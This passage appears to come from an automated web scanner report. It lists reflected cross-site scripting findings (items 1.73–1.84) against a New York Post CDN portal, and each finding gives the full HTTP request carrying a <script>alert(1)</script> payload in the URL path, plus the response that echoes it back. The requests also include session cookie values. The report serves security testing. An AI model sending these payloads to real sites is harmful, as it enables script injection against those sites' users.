Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a1b8<script>alert(1)</script>da1bbd1a30d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal1a1b8<script>alert(1)</script>da1bbd1a30d/nypost/scripts/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal1a1b8<script>alert(1)</script>da1bbd1a30d/nypost/scripts/functions.js</p>
...[SNIP]...

1.73. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ccf8<script>alert(1)</script>f386733da04 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost3ccf8<script>alert(1)</script>f386733da04/scripts/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost3ccf8<script>alert(1)</script>f386733da04/scripts/functions.js</p>
...[SNIP]...

1.74. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 891ef<script>alert(1)</script>c89d8834617 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts891ef<script>alert(1)</script>c89d8834617/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts891ef<script>alert(1)</script>c89d8834617/functions.js</p>
...[SNIP]...

1.75. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e3a9c<script>alert(1)</script>7ba55653210 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/functions.jse3a9c<script>alert(1)</script>7ba55653210 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/functions.jse3a9c<script>alert(1)</script>7ba55653210</p>
...[SNIP]...

1.76. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b86f2<script>alert(1)</script>2fca814566f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigb86f2<script>alert(1)</script>2fca814566f/WebPortal/nypost/scripts/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigb86f2<script>alert(1)</script>2fca814566f/WebPortal/nypost/scripts/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.77. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8db7a<script>alert(1)</script>5eb1a95cd1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal8db7a<script>alert(1)</script>5eb1a95cd1d/nypost/scripts/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal8db7a<script>alert(1)</script>5eb1a95cd1d/nypost/scripts/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.78. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f327<script>alert(1)</script>8246f276b58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost6f327<script>alert(1)</script>8246f276b58/scripts/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost6f327<script>alert(1)</script>8246f276b58/scripts/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.79. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a6d39<script>alert(1)</script>33b854153c7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsa6d39<script>alert(1)</script>33b854153c7/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsa6d39<script>alert(1)</script>33b854153c7/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.80. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f20cd<script>alert(1)</script>9b484f6ac9d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.jsf20cd<script>alert(1)</script>9b484f6ac9d HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.jsf20cd<script>alert(1)</script>9b484f6ac9d</p>
...[SNIP]...

1.81. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43fbe<script>alert(1)</script>43cda8e60ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig43fbe<script>alert(1)</script>43cda8e60ed/WebPortal/nypost/scripts/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:52 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig43fbe<script>alert(1)</script>43cda8e60ed/WebPortal/nypost/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.82. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68a1c<script>alert(1)</script>474fc215b3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal68a1c<script>alert(1)</script>474fc215b3f/nypost/scripts/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:59 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal68a1c<script>alert(1)</script>474fc215b3f/nypost/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.83. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d479f<script>alert(1)</script>6f5cd614b4b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostd479f<script>alert(1)</script>6f5cd614b4b/scripts/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostd479f<script>alert(1)</script>6f5cd614b4b/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.84. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7ffbb<script>alert(1)</script>ca4259161be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts7ffbb<script>alert(1)</script>ca4259161be/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:15 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts7ffbb<script>alert(1)</script>ca4259161be/jquery-ui-tabs.js</p>
...[SNIP]...

